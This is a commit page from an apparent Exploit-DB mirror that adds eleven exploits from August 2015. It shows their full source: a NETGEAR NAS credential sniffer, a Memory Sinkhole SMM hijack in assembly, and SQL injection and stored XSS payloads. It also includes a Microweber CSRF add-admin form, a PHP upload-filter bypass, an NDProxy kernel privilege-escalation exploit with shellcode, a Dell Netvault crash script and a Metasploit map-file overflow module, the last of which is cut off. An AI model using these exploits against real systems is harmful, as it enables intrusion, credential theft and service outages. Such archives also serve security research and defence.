bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-08-08

Browse source 
11 new exploits
This commit is contained in:
Offensive Security 2015-08-08 05:01:44 +00:00
parent 179d07f9d8
commit 84f888e59b
12 changed files with 1014 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

11
files.csv
View file

@ -34033,6 +34033,7 @@ id,file,description,date,author,platform,type,port
37699,platforms/windows/local/37699.py,"Foxit Reader - PNG Conversion Parsing tEXt Chunk Arbitrary Code Execution",2015-07-27,"Sascha Schirra",windows,local,0
37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G v3.0.1.4912 Persistent XSS & Information Leakage",2015-07-27,"John Page",multiple,webapps,0
37706,platforms/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",linux,dos,0
37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III .h3m Map file Buffer Overflow",2015-08-07,metasploit,windows,local,0
37705,platforms/php/webapps/37705.txt,"WordPress Unite Gallery Lite Plugin 1.4.6 - Multiple Vulnerabilities",2015-07-27,"Nitin Venkatesh",php,webapps,80
37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80
37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0
@ -34043,6 +34044,16 @@ id,file,description,date,author,platform,type,port
37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0
37717,platforms/windows/dos/37717.pl,"KMPlayer 3.9.x - .srt Crash PoC",2015-07-31,"Peyman Motevalli Manesh",windows,dos,0
37718,platforms/windows/dos/37718.py,"T-Mobile Internet Manager - Contact Name Crash PoC",2015-07-31,"SATHISH ARTHAR",windows,dos,0
37720,platforms/hardware/webapps/37720.py,"NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,hardware,webapps,0
37721,platforms/multiple/dos/37721.c,"BIND9 - TKEY PoC",2015-08-01,"Errata Security",multiple,dos,0
37722,platforms/linux/local/37722.c,"Linux Privilege Escalation Due to Nested NMIs Interrupting espfix64",2015-08-05,"Andrew Lutomirski",linux,local,0
37723,platforms/multiple/dos/37723.py,"ISC BIND9 TKEY Remote DoS PoC",2015-08-05,elceef,multiple,dos,0
37724,platforms/linux/local/37724.asm,"Linux x86 Memory Sinkhole Privilege Escalation PoC",2015-08-07,"Christopher Domas",linux,local,0
37725,platforms/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",php,webapps,0
37726,platforms/php/webapps/37726.txt,"PHP News Script 4.0.0 - SQL Injection",2015-08-07,"Meisam Monsef",php,webapps,80
37731,platforms/windows/remote/37731.py,"PCMan FTP Server 2.0.7 - PUT Command Buffer Overflow",2015-08-07,"Jay Turla",windows,remote,21
37732,platforms/win32/local/37732.c,"Windows NDProxy Privilege Escalation XP SP3 x86 and 2003 SP2 x86 (MS14-002)",2015-08-07,"Tomislav Paskalev",win32,local,0
37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Stored XSS And CSRF Add Admin Exploit",2015-08-07,LiquidWorm,php,webapps,80
37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 File Upload Filter Bypass Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80
37738,platforms/php/webapps/37738.txt,"WordPress Job Manager Plugin 0.7.22 - Persistent XSS",2015-08-07,"Owais Mehtab",php,webapps,80
37739,platforms/windows/dos/37739.py,"Dell Netvault Backup 10.0.1.24 - Denial of Service",2015-08-07,"Josep Pi Rodriguez",windows,dos,20031

Can't render this file because it is too large.

47
platforms/hardware/webapps/37720.py Executable file
View file

@ -0,0 +1,47 @@
#!/usr/bin/env python
#
# Exploit Title: NETGEAR ReadyNAS LAN /dbbroker Credential Stealing
# Date: 25/07/2015
# Exploit Author: St0rn
# Vendor Homepage: www.netgear.fr/business/products/storage/readynas
# Software Link: apps.readynas.com/pages/?page_id=143
# Version: Firmware 6.2.4
#
### Import ###
from scapy.all import *
from sys import argv,exit
from os import system
### Clear Function ###
def clear():
system("/usr/bin/clear")
### Function to get and decode credential ###
def getReadyNASCredz(p):
if p.haslayer(TCP) and p[IP].dst==argv[2]:
if p.haslayer(Raw):
if "POST /dbbroker" in p[Raw].load:
tmp=p[Raw].load
credz=tmp.split("\r\n")
for i in credz:
if "Authorization: Basic" in i:
print "-----------------".center(80)
print i.split(" ")[2].decode("base64").center(80)
### Main ###
if __name__ == '__main__':
clear()
if len(argv)<3:
print "Usage: %s [device] [NAS_IP]" %(argv[0])
exit(0)
else:
print "\n"
print "#################".center(80)
print "#G0 t0 G3t Cr3dZ#".center(80)
print "#################\n".center(80)
sniff(prn=getReadyNASCredz,iface=argv[1])

74
platforms/linux/local/37724.asm Executable file
View file

@ -0,0 +1,74 @@
; memory sinkhole proof of concept
; hijack ring -2 execution through the apic overlay attack.
; deployed in ring 0
; the SMBASE register of the core under attack
TARGET_SMBASE equ 0x1f5ef800
; the location of the attack GDT.
; this is determined by which register will be read out of the APIC
; for the GDT base. the APIC registers at this range are hardwired,
; and outside of our control; the SMM code will generally be reading
; from APIC registers in the 0xb00 range if the SMM handler is page
; aligned, or the 0x300 range if the SMM handler is not page aligned.
; the register will be 0 if the SMM handler is aligned to a page
; boundary, or 0x10000 if it is not.
GDT_ADDRESS equ 0x10000
; the value added to SMBASE by the SMM handler to compute the
; protected mode far jump offset. we could eliminate the need for an
; exact value with a nop sled in the hook.
FJMP_OFFSET equ 0x8097
; the offset of the SMM DSC structure from which the handler loads
; critical information
DSC_OFFSET equ 0xfb00
; the descriptor value used in the SMM handlers far jump
DESCRIPTOR_ADDRESS equ 0x10
; MSR number for the APIC location
APIC_BASE_MSR equ 0x1b
; the target memory address to sinkhole
SINKHOLE equ ((TARGET_SMBASE+DSC_OFFSET)&0xfffff000)
; we will hijack the default SMM handler and point it to a payload
; at this physical address.
PAYLOAD_OFFSET equ 0x1000
; compute the desired base address of the CS descriptor in the GDT.
; this is calculated so that the fjmp performed in SMM is perfectly
; redirected to the payload hook at PAYLOAD_OFFSET.
CS_BASE equ (PAYLOAD_OFFSET-FJMP_OFFSET)
; we target the boot strap processor for hijacking.
APIC_BSP equ 0x100
; the APIC must be activated for the attack to work.
APIC_ACTIVE equ 0x800
;;; begin attack ;;;
; clear the processor caches,
; to prevent bypassing the memory sinkhole on data fetches
wbinvd
; construct a hijack GDT in memory under our control
; note: assume writing to identity mapped memory.
; if non-identity mapped, translate these through the page tables first.
mov dword [dword GDT_ADDRESS+DESCRIPTOR_ADDRESS+4],
(CS_BASE&0xff000000) | (0x00cf9a00) |
(CS_BASE&0x00ff0000)>>16
mov dword [dword GDT_ADDRESS+DESCRIPTOR_ADDRESS+0],
(CS_BASE&0x0000ffff)<<16 | 0xffff
; remap the APIC to sinkhole SMMs DSC structure
mov eax, SINKHOLE | APIC_ACTIVE | APIC_BSP
mov edx, 0
mov ecx, APIC_BASE_MSR
wrmsr
; wait for a periodic SMI to be triggered
jmp $

26
platforms/php/webapps/37725.txt Executable file
View file

@ -0,0 +1,26 @@
#------------------------------------------------------------------------------------------#
# Exploit Title: Froxlor Server Management Panel - MySQL Login Information Disclosure #
# Date: Jul 30 2015 #
# Exploit Author: Dustin Dörr #
# Vendor Homepage: https://www.froxlor.org/ #
# Version: <= 0.9.33.1 #
#------------------------------------------------------------------------------------------#
An unauthenticated remote attacker is able to get the Froxlor MySQL password and username
via webaccess due to wrong file permissions of the /logs/ folder in Froxlor version
0.9.33.1 and earlier. The plain MySQL password and username may be stored in the
/logs/sql-error.log file. This directory is publicly reachable by default.
some default URLs are:
- http://example.com/froxlor/logs/sql-error.log
- http://cp.example.com/logs/sql-error.log
- http://froxlor.example.com/logs/sql-error.log
the certain section looks like this:
/var/www/froxlor/lib/classes/database/class.Database.php(279):
PDO->__construct('mysql:host=127....', 'DATABASE_USER', 'DATABASE_PASSWORD', Array)
please note that the password in the logfile is truncated to 15 chars,
therefore passwords longer than 15 chars are not fully visible to an attacker.

12
platforms/php/webapps/37726.txt Executable file
View file

@ -0,0 +1,12 @@
# Exploit Title: PHP News Script 4.0.0 Sql Injection
# Date: 2015-08-01
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://phpnewsscript.com/
# Version: 4.0.0
# Tested on: CentOS
Exploit :
http://server/allgallery.php?id=-9999%27+[sql-command]+%23
Test :
http://server/demo/allgallery.php?id=-100%27+union+select+user()%23

80
platforms/php/webapps/37734.html Executable file
View file

@ -0,0 +1,80 @@
<!DOCTYPE html>
<!--
Microweber v1.0.3 Stored XSS And CSRF Add Admin Exploit
Vendor: Microweber Team
Product web page: http://www.microweber.com
Affected version: 1.0.3
Summary: Microweber is an open source drag and drop
PHP/Laravel CMS licensed under Apache License, Version
2.0 which allows you to create your own website, blog
or online shop.
Desc: The application allows users to perform certain
actions via HTTP requests without performing any validity
checks to verify the requests. This can be exploited to
perform certain actions with administrative privileges
if a logged-in user visits a malicious web site. Stored
cross-site scripting vulnerabilitity is also discovered.
The issue is triggered when input passed via the POST
parameter 'option_value' is not properly sanitized before
being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session
in context of an affected site.
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5249
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5249.php
12.07.2015
-->
<html>
<title>Microweber v1.0.3 Stored XSS And CSRF Add Admin Exploit</title>
<br /><br />
<body><center>
<form action="http://localhost/microweber-latest/api/save_user" method="POST">
<input type="hidden" name="id" value="0" />
<input type="hidden" name="thumbnail" value="" />
<input type="hidden" name="username" value="Freakazoid" />
<input type="hidden" name="password" value="00110001" />
<input type="hidden" name="email" value="lab@zeroscience.mk" />
<input type="hidden" name="first_name" value="Joe" />
<input type="hidden" name="last_name" value="Black" />
<input type="hidden" name="is_active" value="1" />
<input type="hidden" name="is_admin" value="1" />
<input type="hidden" name="basic_mode" value="0" />
<input type="hidden" name="api_key" value="" />
<input type="submit" value="CSRF Adminize" />
</form>
</body>
</html>
<br /><br />
<html>
<body>
<form action="http://localhost/microweber-latest/api/save_option" method="POST">
<input type="hidden" name="option_key" value="website_keywords" />
<input type="hidden" name="option_group" value="website" />
<input type="hidden" name="option_value" value='"><img src=j onerror=confirm("ZSL")>' />
<input type="submit" value="Store XSS" />
</form></center>
</body>
</html>

74
platforms/php/webapps/37735.txt Executable file
View file

@ -0,0 +1,74 @@

Microweber v1.0.3 File Upload Filter Bypass Remote PHP Code Execution
Vendor: Microweber Team
Product web page: http://www.microweber.com
Affected version: 1.0.3
Summary: Microweber is an open source drag and drop PHP/Laravel CMS licensed
under Apache License, Version 2.0 which allows you to create your own website,
blog or online shop.
Desc: Microweber suffers from an authenticated arbitrary command execution
vulnerability. The issue is caused due to the improper verification when
uploading files in '/src/Microweber/functions/plupload.php' script. This
can be exploited to execute arbitrary PHP code by bypassing the extension
restriction by putting the dot character at the end of the filename and uploading
a malicious PHP script file that will be stored in '/userfiles/media/localhost/uploaded'
directory.
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5250
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5250.php
12.07.2015
--
PoC Requests:
-------------
1.
POST /microweber-latest/plupload?token=1111111111222222222233333333334444444444&path=media%25255Clocalhost%25255C&path=media%255Clocalhost%255Cuploaded%255C HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 319
Origin: http://localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqX83MP6Cg5JpA193
Accept: */*
Referer: http://localhost/microweber-latest/editor_tools/plupload?type=explorer&filters=*&multiple=true&autostart=undefined&mwv=1.0.3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: mwui=%7B%22%23modules-and-layouts%2C%23tab_modules%2C.tst-modules%22%3A%22true%22%7D; recommend=%7B%22logo%22%3A1%7D; back_to_admin=http%3A//localhost/microweber-latest/admin/view%3Amodules/load_module%3Afiles%23path%3Dmedia%255Clocalhost%255Cuploaded%255C%26select-file%3Dhttp%3A//localhost/microweber-latest/userfiles/media/localhost/uploaded/phpinfo.php; laravel_session=eyJpdiI6ImNYNnkyWjJkOXZyTVRDMXlcL0pKQzBRPT0iLCJ2YWx1ZSI6Ilp6QjhDYjRRMEY4NGR5RzVuZGNxSnd1V3dGQ1R6OVdaWjZrZStiT1Q2bVM3UmRoQjNrak1ORzV5bXZjbzVDSitqdVVkdzdqOFVQa2hZdWRwMlwvMSttZz09IiwibWFjIjoiNGQxYzkwOTk4YmIzNTgzNWRiZmZlOTM4N2I2MzA1NjIzODcwNWRmMWM5ZDcwN2YxMGJlZmQ2ZjUxYmMzNjVjOSJ9
------WebKitFormBoundaryqX83MP6Cg5JpA193
Content-Disposition: form-data; name="name"
phpinfo.php.
------WebKitFormBoundaryqX83MP6Cg5JpA193
Content-Disposition: form-data; name="file"; filename="phpinfo.php."
Content-Type: application/octet-stream
<?php
phpinfo();
?>
------WebKitFormBoundaryqX83MP6Cg5JpA193--
2.
GET http://localhost/microweber-latest/userfiles/media/localhost/uploaded/phpinfo.php HTTP/1.1

39
platforms/php/webapps/37738.txt Executable file
View file

@ -0,0 +1,39 @@
Job Manager Persistent XSS
Details
========================================================================================
Product: Job Manager Plugin For Wordpress
Vendor-URL: www.wp-jobmanager.com
CVE-ID: CVE-2015-2321
Credits
========================================================================================
Discovered by: Owais Mehtab
Affected Products:
========================================================================================
Job Manager Plugin <= 0.7.22
Description
========================================================================================
"Job Manager Plugin For Wordpress"
More Details
========================================================================================
A persistent Cross site scripting (XSS) in Job Manager Plugin has been discovered,
the plugin's email field was not sanitized thus the vulnerability can be easily
exploited and can be used to steal cookies,perform phishing attacks and other various
attacks compromising the security of a user.
Proof of Concept
========================================================================================
Click on the "send through your résume" and set the below vector in email field
'"><img src=x onerror=prompt(document.cookie);>
Now click on initiate chat
PoC Video
https://www.dropbox.com/s/i8cuf15hbdf5tmu/jobmanager-xss.mp4

216
platforms/win32/local/37732.c Executable file
View file

@ -0,0 +1,216 @@
/*
################################################################
# Exploit Title: Windows NDProxy Privilege Escalation (MS14-002)
# Date: 2015-08-03
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
# Windows XP SP3 x86
# Windows XP SP2 x86-64
# Windows 2003 SP2 x86
# Windows 2003 SP2 x86-64
# Windows 2003 SP2 IA-64
# Supported vulnerable software:
# Windows XP SP3 x86
# Windows 2003 SP2 x86
# Tested on:
# Windows XP SP3 x86 EN
# Windows 2003 SP2 x86 EN
# CVE ID: 2013-5065
################################################################
# Vulnerability description:
# NDPROXY is a system-provided driver that interfaces WAN
# miniport drivers, call managers, and miniport call managers
# to the Telephony Application Programming Interfaces (TAPI)
# services.
# The vulnerability is caused when the NDProxy.sys kernel
# component fails to properly validate input.
# An attacker who successfully exploited this vulnerability
# could run arbitrary code in kernel mode (i.e. with SYSTEM
# privileges).
################################################################
# Exploit notes:
# Privileged shell execution:
# - the SYSTEM shell will spawn within the existing shell
# (i.e. exploit usable via a remote shell)
# Exploit compiling:
# - # i586-mingw32msvc-gcc MS14-002.c -o MS14-002.exe
# Exploit prerequisites:
# - low privilege access to the target (remote shell or RDP)
# - target not patched (KB2914368 not installed)
# - service "Routing and Remote Access" running on the target
# - "Power User" user group can start and stop services
# - > sc query remoteaccess
# - > sc start remoteaccess
################################################################
# Thanks to:
# Andy (C PoC - Win XP SP3)
# ryujin (Python PoC - Win XP SP3)
################################################################
# References:
# http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5065
# https://technet.microsoft.com/en-us/library/security/ms14-002.aspx
# https://penturalabs.wordpress.com/2013/12/11/ndproxy-privilege-escalation-cve-2013-5065/
# https://www.exploit-db.com/exploits/30014/
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms681674%28v=vs.85%29.aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858%28v=vs.85%29.aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381%28v=vs.85%29.aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363216%28v=vs.85%29.aspx
################################################################
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
typedef struct {
PVOID Unknown1;
PVOID Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
typedef DWORD NTSTATUS;
NTSTATUS (WINAPI *_NtQuerySystemInformation) (SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
static VOID InitFirstPage (void)
{
PVOID BaseAddress;
ULONG RegionSize;
NTSTATUS ReturnCode;
FARPROC NtAllocateVirtualMemory;
NtAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "NtAllocateVirtualMemory");
fprintf (stderr, "[+] NtAllocateVirtualMemory@%p\n", NtAllocateVirtualMemory);
RegionSize = 0xf000;
BaseAddress = (PVOID) 0x00000001;
ReturnCode = NtAllocateVirtualMemory (GetCurrentProcess (),
&BaseAddress,
0,
&RegionSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (ReturnCode != 0)
{
fprintf (stderr, "[-] NtAllocateVirtualMemory() failed to map first page\n");
fprintf (stderr, " Error code: %#X\n", ReturnCode);
fflush (stderr);
ExitProcess (1);
}
fprintf (stderr, "[+] BaseAddress: %p, RegionSize: %#x\n", BaseAddress, RegionSize), fflush (stderr);
FillMemory (BaseAddress, RegionSize, 0x41);
return;
}
int exploit (unsigned char *shellcode)
{
DWORD writtenBytes;
int returnValue;
InitFirstPage ();
unsigned char *shellcodeBuffer;
shellcodeBuffer = (char *) malloc (400);
memset (shellcodeBuffer, (int) "xCC", 400);
memcpy (shellcodeBuffer, shellcode, 112);
returnValue = WriteProcessMemory ((HANDLE) 0xFFFFFFFF, (LPVOID) 0x00000001, shellcodeBuffer, 0x400, &writtenBytes);
if (returnValue == 0)
{
printf ("[-] Attempt to map memory_write failed\n");
printf (" Error code: %d\n", GetLastError ());
exit(1);
}
HANDLE ndProxyDeviceHandle = CreateFileA ("\\\\.\\NDProxy", 0, 0, NULL, OPEN_EXISTING, 0, NULL);
if (ndProxyDeviceHandle == INVALID_HANDLE_VALUE)
{
printf ("[-] Creating a device handle on NDProxy failed\n");
printf (" Error code: %d\n", GetLastError());
exit (0);
}
DWORD inputBuffer [0x15] = {0};
DWORD returnedBytes = 0;
*(inputBuffer + 5) = 0x7030125;
*(inputBuffer + 7) = 0x34;
DeviceIoControl (ndProxyDeviceHandle, 0x8fff23cc, inputBuffer, 0x54, inputBuffer, 0x24, &returnedBytes, 0);
CloseHandle (ndProxyDeviceHandle);
system ("cmd.exe /T:C0 /K cd c:\\windows\\system32");
return 0;
}
int main (int argc, char **argv)
{
if (argc != 2)
{
printf ("[*] Usage: %s OS_TYPE\n", argv[0]);
printf (" supported OS_TYPE:\n");
printf (" XP - Windows XP SP3 x86\n");
printf (" 2k3 - Windows 2003 SP2 x86\n");
printf ("[*] Note: the service \"Routing and Remote Access\"\n");
printf (" must be running on the target machine\n");
exit (0);
}
else
{
if ((strcmp (argv[1], "xp") == 0) || (strcmp (argv[1], "XP") == 0))
{
unsigned char shellcodeXP[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"
"\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B"
"\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00"
"\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3";
exploit (shellcodeXP);
}
else if ((strcmp (argv[1], "2k3") == 0) || (strcmp (argv[1], "2K3") == 0))
{
unsigned char shellcode2k3[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"
"\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x38\x8B\xC8\x8B"
"\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x83\xB8\x94\x00\x00\x00"
"\x04\x75\xEC\x8B\x90\xD8\x00\x00\x00\x89\x91\xD8\x00\x00\x00\xC3";
exploit (shellcode2k3);
}
else
{
printf ("[-] Invalid argument\n");
printf (" Argument used: %s\n", argv[1]);
exit(0);
}
}
}

59
platforms/windows/dos/37739.py Executable file
View file

@ -0,0 +1,59 @@
"""
Product: Dell Netvault Backup
Link: http://software.dell.com/products/netvault-backup/
Vendor: Dell
Vulnerable Version(s): 10.0.1.24 and probably prior
Tested Version: Version 10.0.1.24
Advisory Publication: July 30, 2015
Vendor Notification: January 9, 2015
Public Disclosure: July 30, 2015
Vulnerability Type: Remote Denial of service
CVE Reference: CVE-2015-5696
Risk Level: Medium
Discovered and Provided: Josep Pi Rodriguez https://es.linkedin.com/pub/josep-pi-rodriguez/60/229/b24
-----------------------------------------------------------------------------------------------
Advisory Details:
Doing reverse engineering of the protocol was found several ways to cause a crash in the nvpmgr.exe process.The entire application (all processes) will die and it won't be able to restart again by itself unless someone do it manually.
Proof of concept script:
"""
#!/usr/bin/python
import socket as so
from struct import *
server = "192.168.140.130"
port = 20031
d = "\x18\x00\x00\x00"
d += "\x01"
#d += "\xCB\x22\x77\xC9" # Another crash example
d += "\x18\xE8\xBE\xC8" # Will cause the crash
d += "\x0B\x00\x00\x00" + "AAAA" + "B" * 6
d += "\x00" # null byte
##
# send it
s = so.socket(so.AF_INET, so.SOCK_STREAM)
s.connect((server, port))
s.send(d)
s.close()
"""
-----------------------------------------------------------------------------------------------
Solution:
Disclosure timeline:
2015-01-09 Vendor notified via email
2015-05-26 Vendor notifies that the issue is fixed in version 10.0.5.x
2015-07-30 Public disclosure.
The fix done by Dell was not checked by the researcher.
-----------------------------------------------------------------------------------------------
"""

321
platforms/windows/local/37737.rb Executable file
View file

@ -0,0 +1,321 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'zlib'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Heroes of Might and Magic III .h3m Map file Buffer Overflow',
'Description' => %q{
This module embeds an exploit into an ucompressed map file (.h3m) for
Heroes of Might and Magic III. Once the map is started in-game, a
buffer overflow occuring when loading object sprite names leads to
shellcode execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Pierre Lindblad', # Vulnerability discovery
'John AAkerblom' # Vulnerability discovery, PoC and Metasploit module
],
'References' =>
[
[ 'EDB', '37716' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Platform' => 'win',
'Targets' =>
[
[
'H3 Complete 4.0.0.0 [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]',
{
# Two "Anticrash"-gadgets are needed or the game will crash before ret
#
# Anticrash1, needs to pass the following code down to final JMP:
# MOV EAX, DWORD PTR DS : [ESI + 4] ; [Anticrash1 + 4]
# XOR EBX, EBX
# CMP EAX, EBX
# JE SHORT <crash spot> ; JMP to crash if EAX is 0
# MOV CL, BYTE PTR DS : [EAX - 1]
# CMP CL, BL
# JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0
# CMP CL, 0FF
# JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0xFF
# CMP EDI, EBX
# JNE <good spot> ; JMP to good spot. Always occurs if we get this far
#
# Summary: An address which when incremented by 4 and then dereferenced
# leads to for example a string which is preceeded neither by a 0x00 or 0xFF
'Anticrash1' => 0x004497D4,
# Anticrash2, needs to return out of the following call (tricky):
#
# MOV EAX, DWORD PTR DS : [ECX] ; [Anticrash2]
# CALL DWORD PTR DS : [EAX + 4] ; [[Anticrash2] + 4]
#
# Summary: An address which when dereferenced leads to an address that
# when incremented by 4 and then deferenced leads to a function returning
# without accessing any registers/memory that would cause a crash.
'Anticrash2' => 0x006A6430,
'Ret' => 0x004EFF87, # CALL ESP Heroes3.exe
'Padding' => 121 # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
}
],
[
'HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]',
{
'Anticrash1' => 0x00456A48,
'Anticrash2' => 0x006A6830,
'Ret' => 0x00580C0F, # CALL ESP Heroes3 HD.exe
'Padding' => 121 # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
}
],
[
'Heroes III Demo 1.0.0.0 [h3demo.exe 522B6F45F534058D02A561838559B1F4]',
{
# The two anticrash gadgets are accessed in reverse order for this target,
# meaning that the documentation above for Anticrash1 applies to Anticrash2
# here. However, Anticrash1 here is accessed differently than the other targets.
# Anticrash1, needs to pass the following code:
# CMP BYTE PTR SS:[EBP+5C], 72 ; [Anticrash1 + 0x5C]
# JNE 00591F37
# MOV EAX,DWORD PTR SS:[EBP+38] ; [Anticrash1 + 0x38]
'Anticrash1' => 0x00580C0F, # Coincidentally the Ret value from HD Mod target
# Anticrash2, see documentation for Anticrash1 (not 2) in H3 Complete 4.0.0.0 target
'Anticrash2' => 0x005CE200,
'Ret' => 0x0043EAB1, # CALL ESP h3demo.exe
'Padding' => 109, # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
'CRC32' => 0xFEEFB9EB
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jul 29 2015',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME',
[
false,
'If file exists, exploit will be embedded' \
' into it. If not, a new default h3m file where' \
' it will be embedded will be created.',
'sploit.h3m'
])
], self.class)
end
def exploit
buf = ''
# Load h3m into buffer from uncompressed .h3m on disk/default data
begin
buf << read_file(datastore['FILENAME'])
print_status('File ' + datastore['FILENAME'] + ' exists, will embed exploit if possible')
rescue Errno::ENOENT
print_warning('File ' + datastore['FILENAME'] + ' does not exist, creating new file from ' \
'default .h3m data')
buf << make_default_h3m
end
# Find the object attributes array in the file by searching for a sprite name that occurs
# as the first game object in all maps.
objects_pos = buf.index('AVWmrnd0.def')
if objects_pos.nil?
print_error('Failed to find game object section in file ' + datastore['FILENAME'] + \
'. Make sure this file is an uncompressed .h3m (and has not yet had exploit embedded)')
return
end
# Entries in the objects array start with a string size followed by game sprite name string
# Move back 4 bytes from the first sprite name to get to the start of the objects array
objects_pos -= 4
print_good('Found object attributes array in file at decimal offset ' + objects_pos.to_s)
# Construct a malicious object entry with a big size, where the sprite name starts
# with a NULL terminator and 6 extra 0x00 bytes. The first 2 of those 6 can be anything,
# but certain values for the last 4 will cause the CALL-ESP gadget address to be overwritten.
# After the 7 0x00 bytes comes 121 bytes of random data and then the CALL ESP-gadget for
# overwriting the saved eip. Finally two "anticrash gadgets" that are used by the game before
# it returns to the CALL ESP-gadget are required for the game not to crash before returning.
size = 7 + target['Padding'] + 4 + 4 + 4 + payload.encoded.size
exp = ''
exp << [size].pack('V')
exp << "\x00" * 7 # The first byte terminates string, next 2 dont matter, last 4 need to be 0
exp << rand_text(target['Padding'])
exp << [target.ret].pack('V')
exp << [target['Anticrash1']].pack('V')
exp << [target['Anticrash2']].pack('V')
exp << payload.encoded
# Embed malicious object entry. It is okay if we overwrite the rest of the file and extend buf
from = objects_pos
to = from + size
buf[from..to] = exp
print_good('Embedded exploit between decimal file offsets ' + from.to_s + ' and ' + to.to_s)
# Demo version has a crc32 check to disallow other maps than the one it comes with.
if target['CRC32']
buf = forge_crc32(buf, target['CRC32'])
if Zlib.crc32(buf) == target['CRC32']
print_good('Forged CRC32 to 0x%08X by adding 4 bytes at end of file' % target['CRC32'])
else
print_error('Failed to forge CRC32')
return
end
end
# Write the uncompressed exploit .h3m (the game can load uncompressed .h3ms)
file_create(buf)
end
def substring_pos(string, substring)
